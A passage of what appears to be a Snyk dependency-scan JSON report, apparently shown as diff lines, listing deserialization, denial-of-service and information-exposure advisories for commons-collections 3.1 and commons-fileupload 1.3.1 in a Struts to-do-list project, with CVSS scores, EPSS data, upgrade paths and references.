untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", - "epssDetails": { - "percentile": "0.82603", - "probability": "0.00880", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-6420" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6hgm-866r-3cjv" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2019-10-10T18:31:03.943542Z", - "functions_new": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-10T00:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2020-02-24T00:00:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:35.761152Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - }, - { - "url": "https://www.exploit-db.com/exploits/46628", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.088365Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99663", - "probability": "0.96725", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-4852" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.946764Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.834525Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "TERASOLUNA Framework Development Team" - ], - "semver": { - "vulnerable": [ - "[1.3,1.3.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.3.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-fileupload:commons-fileupload", - "references": [ - { - "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E", - "title": "Apache Mail Archive" - }, - { - "url": "http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h", - "title": "Apache-SVN" - }, - { - "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092", - "title": "CVE Details" - }, - { - "url": "https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml%23L84", - "title": "Github ChangeLog" - }, - { - "url": "https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1349475", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:46:48.463842Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:14.033291Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:46.791816Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:38.873057Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:48.463842Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:14.033291Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:46.791816Z" - } - ], - "description": "## Overview\n[commons-fileupload:commons-fileupload](https://mvnrepository.com/artifact/commons-fileupload/commons-fileupload) is a component that provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). It allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `commons-fileupload:commons-fileupload` to version 1.3.2 or higher.\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201606.mbox/%3C6223ece6-2b41-ef4f-22f9-d3481e492832@apache.org%3E)\n- [Apache-SVN](http://svn.apache.org/viewvc/commons/proper/fileupload/trunk/RELEASE-NOTES.txt?r1=1745717&r2=1749637&diff_format=h)\n- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/b1498c9877d751f8bc4635a6f252ebdfcba28518/src/changes/changes.xml#L84)\n- [GitHub Commit](https://github.com/apache/tomcat80/commit/d752a415a875e888d8c8d0988dfbde95c2c6fb1d)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/2c3553f3681baf775c50bb0b49ea61cb44ea914f)\n- [GitHub Commit](https://github.com/apache/tomcat/commit/8999f8243197a5f8297d0cb1a0d86ed175678a77)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1349475)\n", - "epssDetails": { - "percentile": "0.92395", - "probability": "0.04275", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3092" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "commons-fileupload:commons-fileupload", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-22T16:51:56Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-fileupload", - "artifactId": "commons-fileupload" - }, - "publicationTime": "2016-12-25T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:46.791816Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.30", - "commons-fileupload:commons-fileupload@1.3.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-fileupload:commons-fileupload", - "version": "1.3.1" - }, - { - "id": "SNYK-JAVA-COMMONSFILEUPLOAD-30401", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[1.1,1.3.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.3.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[1.1,1.3.3)" - ], - "functionId": { - "filePath": "org/apache/commons/fileupload/disk/DiskFileItem.java", - "className": "DiskFileItem", - "functionName": "readObject" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-fileupload:commons-fileupload", - "references": [ - { - "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L65", - "title": "Github ChangeLog" - }, - { - "url": "https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031", - "title": "NVD" - }, - { - "url": "http://www.tenable.com/security/research/tra-2016-12", - "title": "Tenable Security" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:31.745804Z" - }, - { - "assigner": "SUSE", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:04.225757Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:53:55.666846Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:58.367467Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:31.745804Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "SUSE", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:50:04.225757Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:55.666846Z" - } - ], - "description": "## Overview\n[`commons-fileupload:commons-fileupload`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22commons-fileupload%22)\nThe Apache Commons FileUpload library contains a Java Object that, upon deserialization, can be manipulated to write or copy files in arbitrary locations. If integrated with [`ysoserial`](https://github.com/frohoff/ysoserial), it is possible to upload and execute binaries in a single deserialization call.\n\n# Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n- Apache Blog\n\n## Remediation\nUpgrade `commons-fileupload` to version 1.3.3 or higher.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000031)\n- [Tenable Security](http://www.tenable.com/security/research/tra-2016-12)\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L65)\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/388e824518697c2c8f9f83fd964621d9c2f8fc4c)\n", - "epssDetails": { - "percentile": "0.93419", - "probability": "0.05866", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-1000031" - ], - "CWE": [ - "CWE-284" - ] - }, - "packageName": "commons-fileupload:commons-fileupload", - "proprietary": false, - "creationTime": "2017-02-22T07:28:18.753000Z", - "functions_new": [ - { - "version": [ - "[1.1,1.3.3)" - ], - "functionId": { - "className": "org.apache.commons.fileupload.disk.DiskFileItem", - "functionName": "readObject" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-10-25T14:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-fileupload", - "artifactId": "commons-fileupload" - }, - "publicationTime": "2016-10-26T03:04:11.895000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:55.666846Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.37", - "commons-fileupload:commons-fileupload@1.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-fileupload:commons-fileupload", - "version": "1.3.1" - }, - { - "id": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", - "title": "Information Exposure", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,1.3.2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.3.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [ - { - "version": [ - "[1.2.0 ,1.3.2)" - ], - "functionId": { - "filePath": "org/apache/commons/fileupload/FileUploadBase$FileItemIteratorImpl.java", - "className": "FileUploadBase$FileItemIteratorImpl", - "functionName": "" - } - }, - { - "version": [ - "[1.0-rc1,1.2.0)" - ], - "functionId": { - "filePath": "org/apache/commons/fileupload/FileUploadBase.java", - "className": "FileUploadBase", - "functionName": "parseRequest" - } - }, - { - "version": [ - "[,1.0-rc1)" - ], - "functionId": { - "filePath": "org/apache/commons/fileupload/FileUpload.java", - "className": "FileUpload", - "functionName": "parseRequest" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-fileupload:commons-fileupload", - "references": [ - { - "url": "https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml%23L56", - "title": "Github ChangeLog" - }, - { - "url": "https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814", - "title": "GitHub Commit" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:17.073322Z" - } - ], - "description": "## Overview\r\n[`commons-fileupload:commons-fileupload`](https://commons.apache.org/proper/commons-fileupload/) provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.\r\n\r\nAffected versions of the package are vulnerable to Information Disclosure because the `InputStream` is not closed on exception.\r\n\r\n## Remediation\r\nUpgrade `commons-fileupload` to version 1.3.2 or higher.\r\n\r\n## References\r\n- [Github ChangeLog](https://github.com/apache/commons-fileupload/blob/master/src/changes/changes.xml#L56)\r\n- [Github Commit](https://github.com/apache/commons-fileupload/commit/5b4881d7f75f439326f54fa554a9ca7de6d60814)", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-200" - ] - }, - "packageName": "commons-fileupload:commons-fileupload", - "proprietary": false, - "creationTime": "2017-10-01T08:05:48.497000Z", - "functions_new": [ - { - "version": [ - "[1.2.0 ,1.3.2)" - ], - "functionId": { - "className": "org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl", - "functionName": "" - } - }, - { - "version": [ - "[1.0-rc1,1.2.0)" - ], - "functionId": { - "className": "org.apache.commons.fileupload.FileUploadBase", - "functionName": "parseRequest" - } - }, - { - "version": [ - "[,1.0-rc1)" - ], - "functionId": { - "className": "org.apache.commons.fileupload.FileUpload", - "functionName": "parseRequest" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2014-02-17T22:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-fileupload", - "artifactId": "commons-fileupload" - }, - "publicationTime": "2017-02-17T08:05:48Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T14:03:17.073322Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.30", - "commons-fileupload:commons-fileupload@1.3.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-fileupload:commons-fileupload", - "version": "1.3.1" - }, - { - "id": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Jakob Ackermann" - ], - "semver": { - "vulnerable": [ - "[1.0-beta-1, 1.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "1.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-fileupload:commons-fileupload", - "references": [ - { - "url": "https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy", - "title": "Apache Mailing List" - }, - { - "url": "https://github.com/apache/commons-fileupload/commit/0a306f75949f2e9f5f92c400cad39d20117a2eb0", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/tomcat/commit/063e2e81ede50c287f737cc8e2915ce7217e886e", - "title": "GitHub Commit (Tomcat)" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:57.097583Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:59.094771Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 6.5, - "modificationTime": 